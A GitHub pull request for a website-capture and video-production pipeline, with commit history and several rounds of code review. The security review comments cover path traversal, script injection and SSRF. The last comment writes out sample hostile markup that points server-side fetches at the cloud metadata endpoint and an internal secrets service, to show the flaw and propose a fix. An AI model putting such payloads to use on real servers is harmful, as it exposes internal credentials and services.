
feat: website capture pipeline + 7-step video production skill#284

Merged
jrusso1020 merged 36 commits into main from feat/website-capture-design-md
Apr 16, 2026


@ularkim ularkim commented Apr 15, 2026

What

Full website-to-video pipeline: npx hyperframes capture <URL> extracts a site's design system, assets, and screenshots, then the /website-to-hyperframes skill guides an AI agent through a 7-step workflow (capture → DESIGN.md → script → storyboard → VO → build → validate) to produce a professional video.

Why

There was no way to go from a URL to a video. Users had to manually screenshot sites, pick colors, find assets, and figure out the creative direction themselves. This automates the entire pipeline — a single prompt like "Create a 25-second product launch video from https://stripe.com" should produce production-quality output.

How

Capture pipeline (packages/cli/src/capture/):

  • Puppeteer-based extraction: design tokens (colors as HEX, fonts, headings, CTAs, sections), visible text, animations catalog, WebGL shaders, Lottie manifests
  • Asset downloading with DOM context enrichment (alt text, nearest heading, section classes, above-fold detection)
  • Scroll-position screenshots (5 viewports at 0/25/50/75/100% scroll) + per-section viewport tiles (up to 24)
  • Optional Gemini 2.5 Flash vision captioning for downloaded images (GEMINI_API_KEY env var)
  • Auto-generates a CLAUDE.md for the captured site so any agent session can pick up the project

Snapshot command (packages/cli/src/commands/snapshot.ts):

  • npx hyperframes snapshot <dir> --at 2.9,10.4,18.7 for visual self-verification
  • Bundles project HTML, serves locally, launches headless Chrome, seeks to timestamps, captures PNG frames
  • Used by Step 7 (validate) so the agent can visually verify its own output
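A minimal sketch of how the seek timestamps for a snapshot run might be resolved. The function name `resolveSeekTimes`, the default of 5 frames, and the midpoint fallback for a single frame are assumptions made for illustration; they are not taken from snapshot.ts.

```typescript
// Hypothetical helper: turns an `--at` string (e.g. "2.9,10.4,18.7") into seek
// times, or falls back to evenly spaced times when `--at` is not given.
export function resolveSeekTimes(duration: number, at?: string, frames = 5): number[] {
  if (at) {
    return at
      .split(",")
      .map((token) => token.trim())
      .filter((token) => token !== "")
      .map(Number)
      // Drop anything that is not a number inside the composition's duration.
      .filter((t) => Number.isFinite(t) && t >= 0 && t <= duration);
  }
  // A single frame would otherwise divide by (frames - 1) === 0.
  if (frames <= 1) return [duration / 2];
  return Array.from({ length: frames }, (_, i) => (duration * i) / (frames - 1));
}
```

The single-frame guard mirrors the kind of div-by-zero that the later code-fix commit describes for `--frames 1`.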

7-step skill workflow (skills/website-to-hyperframes/):

  • Step 1: Capture & understand (write-down-and-forget method for context management)
  • Step 2: Write DESIGN.md (6-section brand reference, ~90 lines)
  • Step 3: Write SCRIPT (narration with 2.5 words/sec pacing)
  • Step 4: Write STORYBOARD (creative north star — concept-first, cinematic, 8-10 elements per beat)
  • Step 5: Generate VO + map timing (ElevenLabs TTS, word-level timestamps)
  • Step 6: Build compositions (static layout first, then animate, asset cross-reference)
  • Step 7: Validate & deliver (lint, validate, snapshot verification, HANDOFF.md)
  • 10 visual techniques reference with copy-pasteable code patterns
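The 2.5 words/sec pacing in Step 3 implies a simple word budget for a target duration. A small sketch of that arithmetic follows; the function names are hypothetical and whitespace-based word counting is an assumption.

```typescript
const WORDS_PER_SECOND = 2.5; // pacing figure quoted for Step 3

// How many narration words fit in a video of the given length.
export function wordBudget(targetSeconds: number): number {
  return Math.floor(targetSeconds * WORDS_PER_SECOND);
}

// Rough narration length for a draft script, counting whitespace-separated words.
export function estimateSeconds(script: string): number {
  const words = script.trim().split(/\s+/).filter(Boolean).length;
  return words / WORDS_PER_SECOND;
}
```

Under this rule, the 25-second example prompt from the "Why" section leaves room for about 62 words of narration.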

GSAP lint rule (packages/core/src/lint/rules/gsap.ts):

  • Extended gsap_css_transform_conflict to detect inline style="transform:..." attributes
  • Indexes all classes on an element (not just the first) for accurate conflict detection
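To illustrate the inline-style case, here is a rough sketch of checking whether a `style` attribute sets `transform`. This is not the rule's actual implementation; `inlineStyleSetsTransform` is a hypothetical name, and splitting on `;` is a simplification that would misparse values containing semicolons (for example data URLs).

```typescript
// Returns true when an inline style string declares a `transform` other than `none`.
// Properties such as `transform-origin` are deliberately not matched.
export function inlineStyleSetsTransform(styleAttr: string): boolean {
  return styleAttr
    .split(";")
    .map((declaration) => declaration.split(":"))
    .some(([prop, ...rest]) => {
      const name = (prop ?? "").trim().toLowerCase();
      const value = rest.join(":").trim().toLowerCase();
      return name === "transform" && value !== "" && value !== "none";
    });
}
```

A lint rule could combine a check like this with the list of selectors that GSAP tweens target, and flag elements that appear in both.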

Notable decisions:

  • Storyboard-driven, not DESIGN.md-driven — DESIGN.md is a brand cheat sheet, the storyboard is the creative north star
  • No checklist in the skill — tested across 6 iterations; checklists killed creativity (agents spent context checking boxes instead of building interesting compositions)
  • Gemini captioning is optional and gracefully degrades — Promise.allSettled handles individual failures
  • Captions are optional (only built if user requests) to reduce overhead
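The graceful-degradation point can be sketched as a batched runner built on `Promise.allSettled`, so that one failed caption or download does not abort the rest. The name `mapInBatches` and the result shape are assumptions for illustration, not the pipeline's real code.

```typescript
// Runs `worker` over `items` in fixed-size batches. Failures are collected
// instead of thrown, so the caller can continue with whatever succeeded.
export async function mapInBatches<T, R>(
  items: readonly T[],
  batchSize: number,
  worker: (item: T) => Promise<R>,
): Promise<{ results: R[]; failures: unknown[] }> {
  const size = Math.max(1, Math.floor(batchSize)); // guard against 0 or negative sizes
  const results: R[] = [];
  const failures: unknown[] = [];
  for (let i = 0; i < items.length; i += size) {
    const settled = await Promise.allSettled(items.slice(i, i + size).map(worker));
    for (const outcome of settled) {
      if (outcome.status === "fulfilled") results.push(outcome.value);
      else failures.push(outcome.reason);
    }
  }
  return { results, failures };
}
```

Returning the failures rather than swallowing them lets the caller surface them as warnings.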

Test plan

  • Manual testing: 6 iterations across Stripe and Railway websites with full pipeline execution
  • CLI type-checks clean (tsc --noEmit — pre-existing errors in verify/index.ts only)
  • Lint + format pass (oxlint + oxfmt via lefthook pre-commit)
  • Code review: 16 bugs found and fixed (path traversal, browser leak, div-by-zero, dead code, wrong API config, broken skill references)
  • All skill file cross-references verified (transitions/catalog.md, shader-setup.md, techniques.md, etc.)
  • Unit tests for inline-style GSAP lint detection (identified gap, not yet written)
  • Documentation updated (CLAUDE.md aligned with main, AGENTS.md untouched)

🤖 Generated with Claude Code

ukimsanov and others added 29 commits April 15, 2026 14:04
Adds `hyperframes capture <url>` command that extracts a complete design
system from any website, producing AI-agent-ready output:

- Full-page screenshot (lazy-load aware, nav at top)
- AI-generated DESIGN.md via Claude API (colors, typography, elevation,
  components, do's/don'ts) with programmatic asset catalog (136+ assets
  with HTML context annotations like img[src], css url(), link[rel=preload])
- CSS-purged compositions (87% size reduction via PurgeCSS)
- HTML-prettified compositions (one-tag-per-line for AI readability)
- CLAUDE.md + .cursorrules auto-generated for AI agent instructions
- Asset deduplication (srcset variants) and tracking pixel filtering
…ment

- switch to gemini 3.1 pro (gemini-3.1-pro-preview) with claude fallback
- playwright for full-page screenshots (fixes puppeteer gradient/fixed bugs)
- replica refinement loop: generate, screenshot, compare, fix
- extract inline svgs (50 max, 10kb each) to assets/svgs/
- extract visible text in dom order for content accuracy
- detect js libraries (gsap, three.js, scrolltrigger) via globals
- improved asset catalog grouping and naming
- reverse-engineered aura system prompt documentation
- comprehensive session handoff doc

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- key finding: team already wants DESIGN.md integration (James, Bin, Vance)
- skills quality matters enormously - must invoke /hyperframes-compose
- eval infrastructure exists (Abhay's dashboards, Teodora's 78-criteria guide)
- templates at templates/ need study before finalizing skill
- session handoff updated with critical next steps
Captures Lottie animations via network interception and WebGL shader
source via gl.shaderSource hooking during site crawl. Updates
website-to-hyperframes skill with asset planning guidance, Lottie/shader
reading instructions, and stronger creative direction for scene planning.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Capture pipeline:
- Remove dead deps (puppeteer-extra, stealth plugin, duplicate devDeps)
- Remove duplicate generateAgentPrompt() call (first lied about DESIGN.md)
- Remove dead canvas-to-image code in htmlExtractor (post canvas removal)
- Parallelize image downloads (batches of 5 via Promise.allSettled)
- Fix pre-existing TS error (match[1] guard in font downloader)
- Default capture output to captures/<hostname>

Skill creative overhaul:
- Add shader transition selection to creative director step (Step 4)
- Add shader wiring instructions to engineer step (Step 5)
- Replace 4-line energy modifiers with visual vocabulary table
- Strip rigid scene-by-scene templates from video-recipes.md
- Strip example fill data from scene plan tables
- Add "read transition refs before planning" instruction
- Add creative ambition language ("how the hell did they make this")

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Comprehensive redesign of website-to-hyperframes skill and capture
pipeline based on code review findings and Claude Code architecture
research. Key changes: remove AI auto-generation, restructure skill
into phases, embed shader boilerplate in scaffold, fix color format.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
13-task plan covering: capture pipeline cleanup (remove AI generation,
fix colors to HEX, add asset descriptions, shader-ready scaffold),
skill restructuring (4 phases with artifact gates), and compose skill
Visual Identity Gate upgrade.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Remove orphaned `false` argument in generateAgentPrompt call (critical:
  was shifting hasLottie, hasShaders, catalogedAssets parameters)
- Add HSL color handling in rgbToHex via temp element resolution
- Remove build artifact commit section from phase-4-build.md
- Fix __GSAP_TIMELINE reference to __timelines

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…criptions

- Double-escape regex in tokenExtractor template literal (\s→\\s, \d→\\d, \(→\\()
  so browser receives valid regex patterns via page.evaluate()
- Simplify index.html scaffold: scene slots + audio + timeline + comment pointing
  to shader-setup.md reference (no broken inline shader boilerplate)
- Fix asset descriptions: use CatalogedAsset.contexts/notes instead of
  nonexistent htmlContext field

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Code fixes:
- snapshot.ts: path traversal guard, browser leak (try/finally), div-by-zero
  for --frames 1, port bind error handling, rAF-based render settle
- index.ts: remove invalid thinkingConfig for gemini-2.5-flash, fix Gemini
  batch/rate-limit comments, fix video preview viewport y-coordinate
- tokenExtractor.ts: remove dead seen[si] dedup code
- gsap.ts: index ALL classes for inline-style transform conflict detection

Skill architecture rewrite (4-phase → 7-step):
- Replace phase-1 through phase-4 with step-1 through step-7
- Add techniques.md (10 visual techniques with code patterns)
- Fix /hyperframes-compose → /hyperframes (skill doesn't exist)
- Fix captures/arc-browser reference → shader-setup.md (file doesn't exist)
- Fix step-7 hardcoded captures/stripe path
- Document Gemini API free/paid rate limits in step-1

Cleanup:
- CLAUDE.md: restore from Stripe-capture overwrite, update 4-phase → 7-step
- .gitignore: add PR #267 skills (hyperframes-animation-map, hyperframes-contrast)
- Delete old phase-*.md, animation-recreation.md, tts-integration.md

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Remove files that shouldn't ship in this PR:
- docs/research/ (aura analysis, prompt catalogs)
- docs/session-*.md, docs/SESSION-HANDOFF.md (dev notes)
- docs/superpowers/ planning and spec docs
- pnpm-lock.yaml at root and cli (repo uses bun, not pnpm)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…ames mention

Main PR #283 removed the full skills table from CLAUDE.md and moved it
to AGENTS.md. Align with that decision: use main's slim dev-focused
format, fix pnpm→bun references, add one-line /website-to-hyperframes
pointer.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The capture command was registered in cli.ts but missing from
the help groups, so it wouldn't appear in `hyperframes --help`.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The lockfile was stale after rebasing onto main — bun install
--frozen-lockfile failed in CI because new dependencies (google/genai,
patchright, purgecss) weren't reflected in the lockfile.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
@ularkim ularkim requested a review from jrusso1020 April 15, 2026 18:20
>
$1.9T
</div>

Collaborator

Contradicts step-6-build.md rule. This code example uses left:50%;transform:translateX(-50%) for centering — the exact pattern that step-6-build.md:133 explicitly forbids:

Never use ANY CSS transform for centering — not translate(-50%, -50%), not translateX(-50%). GSAP animates the transform property, which overwrites ALL CSS transforms including centering. The element flies offscreen.

The linter also catches this (gsap_css_transform_conflict), and the new inline-style detection in this same PR would flag it. Fix to flexbox centering:

<div style="position:absolute;top:280px;left:0;width:100%;
  display:flex;justify-content:center;">
  <div id="hero-stat" style="font-size:200px;font-weight:900;color:#fff;opacity:0;">
    $1.9T
  </div>
</div>

Same fix needed for the #label element a few lines below.

if (root) return parseFloat(root.getAttribute("data-duration") ?? "0");
const tls = win.__timelines;
if (tls) {
for (const key in tls) {
Collaborator

Same duration function bug. This is the same pattern flagged in the other inline review — win.__player.duration may be a GSAP method reference (truthy but not a number), which propagates to the seek positions as NaN. Same fix:

const d = win.__player?.duration;
if (d != null) return typeof d === "function" ? d() : d;

res.end();
return;
}
if (existsSync(filePath)) {
Collaborator

POSIX-only path traversal guard — third instance. Same pattern flagged on capture/index.ts and verify/index.ts. projectDir + "/" breaks on Windows where the separator is \. All three should share a single helper:

import { relative, isAbsolute } from "node:path";
function isInsideDir(base: string, target: string): boolean {
  const rel = relative(base, target);
  return !rel.startsWith("..") && !isAbsolute(rel);
}
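A short sketch of how such a helper might be used in a local file server, assuming the request path is decoded and resolved against the project directory first. `resolveRequestPath` is a hypothetical wrapper, and query-string stripping is left out for brevity.

```typescript
import { isAbsolute, relative, resolve } from "node:path";

// Same check as the helper suggested in the review comment.
function isInsideDir(base: string, target: string): boolean {
  const rel = relative(base, target);
  return !rel.startsWith("..") && !isAbsolute(rel);
}

// Hypothetical wrapper: maps a request URL path to a file path, or returns
// null when the path is malformed or escapes the project directory.
export function resolveRequestPath(projectDir: string, urlPath: string): string | null {
  let decoded: string;
  try {
    decoded = decodeURIComponent(urlPath);
  } catch {
    return null; // malformed percent-encoding
  }
  const filePath = resolve(projectDir, "." + decoded);
  return isInsideDir(projectDir, filePath) ? filePath : null;
}
```

Because the check works on the relative path rather than a string prefix, a sibling directory such as `project-evil` is rejected even though its path starts with the project directory's name.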

Comment thread .gitignore Outdated
notion-ai-agents/
stripe-launch/
stripe-investor/
stripe-website/
Collaborator

20 hardcoded test capture directories. These are the author's local test artifacts — notion-promo/, stripe-launch/, arc-browser/, lusion-brand/, etc. They'll grow with every test run and don't belong in the repo's gitignore. Replace with a generic pattern:

# Capture outputs
captures/
*-capture/

Or add them to .git/info/exclude if they're local-only.

Comment thread package.json
"purgecss": "^8.0.0"
},
"devDependencies": {
"@commitlint/cli": "^20.5.0",
Collaborator

Root production dependencies that only the CLI uses. patchright and purgecss are added here but only packages/cli uses them. purgecss is already in packages/cli/package.json. Move patchright to the CLI package and remove both from root — this avoids bloating bun install for anyone working on core, engine, player, etc.

Comment thread packages/cli/package.json
@@ -35,22 +36,21 @@
Collaborator

Hard dependency for optional Gemini captioning. The PR description says "Gemini captioning is optional and gracefully degrades" with Promise.allSettled. But @google/genai is a non-optional dependency here — it gets installed for every user even if they never set GEMINI_API_KEY. Dynamically import with try/catch instead, or move to optionalDependencies.
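One way the dynamic-import suggestion could look, as a sketch only. `loadOptionalModule` and `canCaption` are hypothetical names; the real capture code may structure this differently.

```typescript
// Tries to load a package that may not be installed. Returns null instead of
// throwing, so the caller can skip the optional feature.
export async function loadOptionalModule<T = unknown>(specifier: string): Promise<T | null> {
  try {
    return (await import(specifier)) as T;
  } catch {
    return null; // package missing or failed to load
  }
}

// Captioning is attempted only when a key is set AND the SDK can be loaded.
export async function canCaption(apiKey: string | undefined): Promise<boolean> {
  if (!apiKey) return false;
  return (await loadOptionalModule("@google/genai")) !== null;
}
```

With this shape, users who never set GEMINI_API_KEY never trigger the import at all.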

Comment thread packages/cli/package.json Outdated
"postcss": "^8.5.8",
"puppeteer-core": "^24.39.1"
"prettier": "^3.8.1",
"puppeteer-core": "^24.39.1",
Collaborator

CLI now depends on both puppeteer-core AND playwright. screenshotCapture.ts uses Playwright for captureFullPageScreenshot while everything else uses Puppeteer. That's ~200MB+ of extra browser binaries for one function. Either migrate the full-page screenshot to Puppeteer's page.screenshot({ fullPage: true }) (which already works), or move everything to Playwright. Having both is costly for install size and maintenance.

- **Kokoro** (offline last resort — has Python dependency issues on many systems) — `npx hyperframes tts SCRIPT.md --voice af_nova --output narration.wav`. Only try this if ElevenLabs and HeyGen are unavailable.

Pick the voice that sounds most natural and conversational. Listen for pacing — does it breathe between sentences? Does it sound like a person or a robot?

Collaborator

TTS ranking contradicts CLAUDE.md and the hyperframes skill. ElevenLabs is listed as "recommended" here, with Kokoro relegated to "offline last resort — has Python dependency issues." But the project's CLAUDE.md documents Kokoro-82M as the primary TTS tool (npx hyperframes tts), and references/tts.md in the hyperframes skill is entirely Kokoro-focused.

An agent following this skill will skip the built-in tool in favor of an external API that requires auth setup. The ranking should either:

  • Put Kokoro first (it's built-in, no API key, no auth)
  • Or explicitly state when to prefer ElevenLabs over Kokoro (e.g., "when voice quality matters more than setup speed")

Also: the note says HeyGen TTS "returns word timestamps automatically" — that's exactly what downstream steps need for beat mapping. If timing is the priority, HeyGen should rank above ElevenLabs, not below it.

Review fixes (16 comments from jrusso1020 + vanceingalls):
- screenshotCapture: remove Playwright dep, use Puppeteer for all screenshots
- screenshotCapture: dynamic screenshot count based on page height (30% overlap)
- snapshot.ts: fix duration() function-vs-property bug, cross-platform path guard
- htmlExtractor: fix code injection via parameterized evaluate
- index.ts: video preview re-measures position after scroll, .env file loading
- capture.ts: BLOCKED.md on timeout failures
- gsap.ts: 5 inline-style lint tests added (all pass)
- Remove Playwright, patchright deps; @google/genai to optionalDependencies
- Gitignore: generic patterns instead of 20 hardcoded directories
- Remove asset-sourcing.md, video-recipes.md (unused, duplicated guidance)

Capture quality improvements (tested on 10+ websites):
- Color extraction: canvas-based oklch/lab resolver, pixel sampling via
  elementFromPoint, broad sweep for accent colors, gradient/shadow extraction
- Section detection: broadened selectors for div-based layouts, height cap
  to skip page-level wrappers, parent bg walkup for dark sites
- Font downloads: cap 6 per family / 30 total (Cal.com: 306→30)
- CTA detection: text pattern matching + nav context filtering
- Heading text: innerText with whitespace normalization
- Gemini captioning: maxOutputTokens 100→300, .env auto-loading
- .env.example updated with GEMINI_API_KEY docs
- TTS ranking: Kokoro first with Python 3.10+ note
Author

ularkim commented Apr 16, 2026

Review Response

Addressed all 16 comments in commit 6266708. Here's the summary:

Fixed ✅

| # | Issue | Fix |
|---|---|---|
| 1 | Playwright browser leak | Removed Playwright entirely; all screenshots now use Puppeteer |
| 2 | Video preview stale coords | Re-measures position after scroll via getBoundingClientRect(), seeks to 0.1s for decoder |
| 3/10 | duration function bug | typeof d === "function" ? d() : d check |
| 4/11 | Path traversal Windows | path.relative + isAbsolute check |
| 5 | No inline-style lint tests | 5 tests added (translate, scale, rotate no-FP, multi-class, dual style+inline) |
| 7 | Duplicated guidance | Removed video-recipes.md and asset-sourcing.md (sources of duplication) |
| 8 | Code injection htmlExtractor | Parameterized page.evaluate(fn, href) instead of string interpolation |
| 9 | video-recipes contradiction | File removed (the translateX centering example is gone) |
| 12 | 20 hardcoded gitignore entries | Replaced with generic patterns (*-capture/, *-demo/, etc.) |
| 13 | Root deps | Removed patchright (dead dep, never imported); purgecss already in CLI |
| 14 | @google/genai hard dep | Moved to optionalDependencies |
| 15 | Puppeteer + Playwright | Removed Playwright entirely; screenshots use Puppeteer with dynamic viewport tiling |
| 16 | TTS ranking | Kokoro first (free, built-in) with Python 3.10+ requirement noted and ElevenLabs/HeyGen as fallbacks |

Deferred to follow-up PR

| # | Issue | Reason |
|---|---|---|
| 6 | Split index.ts (1126 lines) | Significant refactor risk in same PR as 15+ other changes. Will do as immediate follow-up. |

Additional improvements in this commit

  • Color extraction: canvas-based oklch/lab resolver, pixel sampling via elementFromPoint, gradient/shadow color extraction
  • Section detection: broadened selectors, height cap for page wrappers, parent bg walkup
  • Font downloads: capped at 6/family, 30 total (Cal.com: 306→30)
  • CTA detection: text pattern matching + nav context filtering
  • Screenshots: dynamic count based on page height (30% overlap), removed section tiling
  • Gemini captioning: .env auto-loading, maxOutputTokens 100→300
  • BLOCKED.md: written on timeout/anti-bot failures
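The dynamic screenshot count can be illustrated with a small calculation. This is a sketch under assumptions: the function name, the even spacing of offsets, and the default cap of 20 (a figure mentioned in a later review comment) are illustrative rather than the actual screenshotCapture.ts logic.

```typescript
// Computes scroll offsets so that consecutive viewport screenshots overlap by
// at least `overlap` (0.3 = 30%), unless the `maxShots` cap forces wider steps.
export function scrollOffsets(
  pageHeight: number,
  viewportHeight: number,
  overlap = 0.3,
  maxShots = 20,
): number[] {
  const maxScroll = Math.max(0, pageHeight - viewportHeight);
  if (maxScroll === 0) return [0]; // page fits in one viewport
  const step = viewportHeight * (1 - overlap);
  const count = Math.min(maxShots, Math.ceil(maxScroll / step) + 1);
  if (count === 1) return [0]; // only reachable when maxShots is 1
  // Spread the shots evenly from the top of the page to the last scroll position.
  return Array.from({ length: count }, (_, i) => Math.round((maxScroll * i) / (count - 1)));
}
```

For a 2160px page in a 1080px viewport this yields three shots at 0, 540, and 1080.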

Tested on 10+ websites: Linear, Cal.com, Tailwind CSS, Supabase, Basecamp, Dribbble, Notion, Resend, Midjourney, Dub.co, Shopify, Vercel.

Collaborator

@vanceingalls vanceingalls left a comment

All 16 review items from both passes have been addressed in 6266708. Nice work.

One fix needed before merge — CI is red:

In verify/index.ts:132,137, noUncheckedIndexedAccess: true means sections[i] is typed SectionResult | undefined. Add a guard:

const section = sections[i];
if (!section) continue;

Minor (not blocking): verify/index.ts file server (~line 95) has no path traversal guard — same join(projectDir, url) pattern that was fixed in snapshot.ts. Low risk (localhost, random port, short-lived) but worth matching the fix pattern from snapshot.ts:

const rel = relative(projectDir, filePath);
if (rel.startsWith('..') || isAbsolute(rel)) { res.writeHead(403); res.end(); return; }

Everything else looks solid — parameterized evaluate, Playwright removal, optional Gemini dep, TTS ranking, lint tests, gitignore patterns all check out.

Collaborator

@jrusso1020 jrusso1020 left a comment

Staff-Engineer Second Pass Review

The fix commit (6266708) addressed the majority of the first-round feedback well — credit to @ularkim for taking it seriously. Browser leak, code injection, duration bug, path traversal in snapshot.ts, GSAP lint tests, Playwright removal, TTS ranking, and the video-recipes.md duplication source are all resolved. Solid work.

That said, a few items remain open from the first round, and the fix commit introduced one new regression.


Still Open — Must Fix Before Merge

1. verify/index.ts — path traversal (security)
The file server has no path traversal guard. req.url is decoded and join()-ed to projectDir without checking whether the result escapes the directory. This was fixed in snapshot.ts but NOT here — same bug, same pattern. Needs the same relative() + isAbsolute() guard that snapshot.ts now has. Lift it into a shared helper since it's needed in two places.

2. capture/index.ts — still 1,175 lines
The modularity concern was acknowledged but not addressed. The file orchestrates browser launch, WebGL hooks, Lottie interception, animation cataloging, HTML extraction, token extraction, video manifest, text extraction, Gemini captioning, asset descriptions, section splitting, CSS purging, and project scaffolding — in one function. The ═══ comment banners are literally the module boundaries waiting to become files. This is the single biggest maintainability risk in the PR and will make the next bug in this pipeline painful to isolate.

3. package.json: adm-zip removed but still dynamically imported (regression)
The fix commit removed adm-zip from dependencies, but index.ts still dynamically imports it for .lottie file extraction (const AdmZip = (await import("adm-zip")).default). This will crash at runtime when a captured site has Lottie animations packaged as .lottie files. Either restore the dependency or remove the dead code path.


Should Fix

4. Lottie JSON injection in index.ts
Raw Lottie JSON file content (animJson) is interpolated directly into a <script> tag template literal: animationData:${animJson}. A malicious Lottie file could break out of the JS expression. Low blast radius (headless Chrome, short-lived), but still a code injection vector. Use JSON.stringify() to safely embed it.

5. Step-4 contradiction on technique count
step-4-storyboard.md says "Pick 2-3 per beat" (so 16-24 technique uses for an 8-beat video) but the global guardrails in the same file say "Use at least 2-3 different techniques across the video" (only 2-3 total). These differ by roughly 8x. The per-beat guidance matches the surrounding context, so tighten the global guardrail phrasing to match.

6. .env.example removed ANTHROPIC_API_KEY
The old file had ANTHROPIC_API_KEY for "AI-assisted composition via MCP." This PR replaces it with GEMINI_API_KEY. If MCP composition is still a feature (and it is), new contributors won't discover it. Keep both keys listed.

7. Step-6 asset presentation recommends transform: perspective(...) as static CSS
This directly conflicts with the "GSAP overwrites ALL CSS transforms" rule in the same file's Critical Rules section. If an agent applies this tilt AND then animates with GSAP, the tilt vanishes. Should recommend gsap.set() instead for elements that will be animated.

8. step-1-capture.md leads with Gemini API key
The capture works fully without any API key — DOM-context descriptions (alt text, nearest heading, section classes, above-fold) are the zero-config default, and @google/genai is correctly in optionalDependencies. But the skill doc's first paragraph leads with the Gemini key, which can give agents (or users) the impression it's required. Suggest reordering to lead with the zero-config path:

npx hyperframes capture <URL> -o captures/<project-name>

No API keys required. The capture extracts design tokens, screenshots, fonts, and assets with DOM-context descriptions automatically.

Optional: Set GEMINI_API_KEY for richer AI-powered image descriptions via Gemini 2.5 Flash vision.


Nits

  • ~15 silent catch {} blocks in index.ts swallow errors without pushing to warnings[] — users won't know why a capture is incomplete
  • snapshot.ts CLI help uses hardcoded captures/stripe; captures/<project> would be more consistent with skill docs
  • visual-style.md vs visual-styles.md disambiguation exists but is buried in a parenthetical — could be a standalone callout

Verdict

Three items remain blocking: the verify/index.ts path traversal (#1, security), adm-zip runtime crash (#3, regression from the fix commit), and index.ts modularity (#2, maintainability). The first two are quick fixes; #2 is the real question — gate merge or track as immediate follow-up.

Everything else from the first round was resolved well. The overall feature design is strong.

Review round 2 fixes (jrusso1020 + vanceingalls):
- verify/index.ts: add path traversal guard (relative + isAbsolute)
- verify/index.ts: fix sections[i] undefined typecheck error (CI green)
- index.ts: escape Lottie JSON with \u003c to prevent </script> breakout
- step-4-storyboard: fix technique count contradiction (2-3 per beat, not
  across whole video)
- step-6-build: perspective tilt uses gsap.set() instead of CSS transform
  (avoids GSAP overwrite conflict)
- step-1-capture: reorder — command first, Gemini note after (zero-config
  is the default path, API key is optional enhancement)
- step-7-validate: add tsx fallback for snapshot command
- step-3-script: vary hook patterns, don't default to number every time
- assetDownloader: exempt SVGs from 10KB minimum filter (company logos
  like Hubspot/Intel/DHL are 2-6KB; HeyGen capture: 13→75 assets)

Note: adm-zip was NOT removed (reviewer #3) — it's still in
packages/cli/package.json:30. The root package.json had patchright
and purgecss removed, not adm-zip.

Note: ANTHROPIC_API_KEY not restored in .env.example — grep confirms
zero references in the entire codebase. The @anthropic-ai/sdk dependency
was removed earlier in this branch.
Collaborator

@miguel-heygen miguel-heygen left a comment

Third-pass review — focused on issues not covered by James's or Vance's reviews. All their feedback still stands. The latest commit (6266708) correctly addresses all previously flagged items (verified each fix).

Must fix before merge

  1. SSRF via unrestricted fetch() in asset downloads and CSS fetching: fetchBuffer() and the stylesheet fetch in htmlExtractor.ts follow any URL from the target page, including cloud metadata endpoints (169.254.169.254), internal services, and localhost. Inline on assetDownloader.ts.
  2. JS injection via Lottie JSON interpolated into setContent — raw fetched JSON is template-literal'd directly into a <script> block. A crafted Lottie file can break out of the JS context. Inline on index.ts.
  3. verify/index.ts file server has no path traversal guard — the fix applied to snapshot.ts was not applied here. Inline.

Should fix

  1. Unbounded response body in Lottie interception: response.buffer() downloads the full body before size-checking. Inline on index.ts.
  2. adm-zip used at runtime but missing from dependencies: index.ts dynamically imports adm-zip to extract dotLottie ZIP files. The try/catch prevents crashes, but dotLottie extraction silently fails. Should be in optionalDependencies (like @google/genai) or a regular dep.
  3. Manual .env parsing is fragile — hand-rolled parser doesn't handle edge cases and modifies process.env as a side effect. Inline on index.ts.

Smaller items (not blocking)

  • Lottie dedup uses jsonData.slice(0, 200) as a "hash" — files with identical headers get falsely deduped
  • maxScreenshots param accepted but unused (underscore-prefixed); cap hardcoded at 20 in screenshotCapture.ts
  • prettier (14MB+) is a regular dep but only used optionally in cssPurger.ts — should be optionalDependencies
  • Duplicate slugify() in assetDownloader.ts and compositionGen.ts
  • CDP session from animationCataloger.ts is disabled but never detached
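For the Lottie dedup item, a content hash avoids the false positives of comparing only the first 200 characters. A minimal sketch, assuming the Lottie payloads are available as strings; `dedupeByContent` is a hypothetical name.

```typescript
import { createHash } from "node:crypto";

// Keeps the first occurrence of each distinct payload, comparing by SHA-256 of
// the full content rather than a prefix.
export function dedupeByContent(files: readonly string[]): string[] {
  const seen = new Set<string>();
  const unique: string[] = [];
  for (const json of files) {
    const digest = createHash("sha256").update(json).digest("hex");
    if (seen.has(digest)) continue;
    seen.add(digest);
    unique.push(json);
  }
  return unique;
}
```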

Verification of fixes from commit 6266708

All 7 previously flagged items verified as correctly fixed:

  • htmlExtractor.ts injection: parameterized page.evaluate
  • screenshotCapture.ts: Playwright removed, Puppeteer only
  • snapshot.ts duration(): typeof d === "function" check
  • snapshot.ts path traversal: relative() + isAbsolute()
  • GSAP lint tests: 5 new tests added
  • .gitignore: generic patterns
  • @google/genai: optionalDependencies

try {
const res = await fetch(url, {
signal: AbortSignal.timeout(10000),
headers: { "User-Agent": "HyperFrames/1.0" },
Collaborator

SSRF via unrestricted fetch(). fetchBuffer() follows any URL passed to it — including cloud metadata endpoints, internal services, and localhost. Since the capture pipeline navigates to arbitrary user-provided URLs and then fetches derived URLs (stylesheets, images, Lotties) server-side, a malicious site can embed:

<link rel="stylesheet" href="http://169.254.169.254/latest/meta-data/">
<img src="http://internal-service:8080/admin/secrets">

...and this function will fetch them and save the response to disk.

Fix: Add URL validation before fetching. At minimum reject private IP ranges (10.x, 172.16-31.x, 192.168.x, 127.x, 169.254.x), non-HTTP(S) schemes, and localhost. Apply the same check in the CSS fetch in htmlExtractor.ts and the Lottie download in index.ts.
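A rough sketch of the minimum validation described above. `isPublicHttpUrl` is a hypothetical name, the IPv6 checks and the 0.x range are extra assumptions beyond the ranges listed, and the function does not resolve DNS, so a hostname that points at a private address would still pass.

```typescript
import { isIP } from "node:net";

// Returns false for non-HTTP(S) schemes, localhost, and literal private,
// loopback, or link-local IP addresses. DNS names are NOT resolved here.
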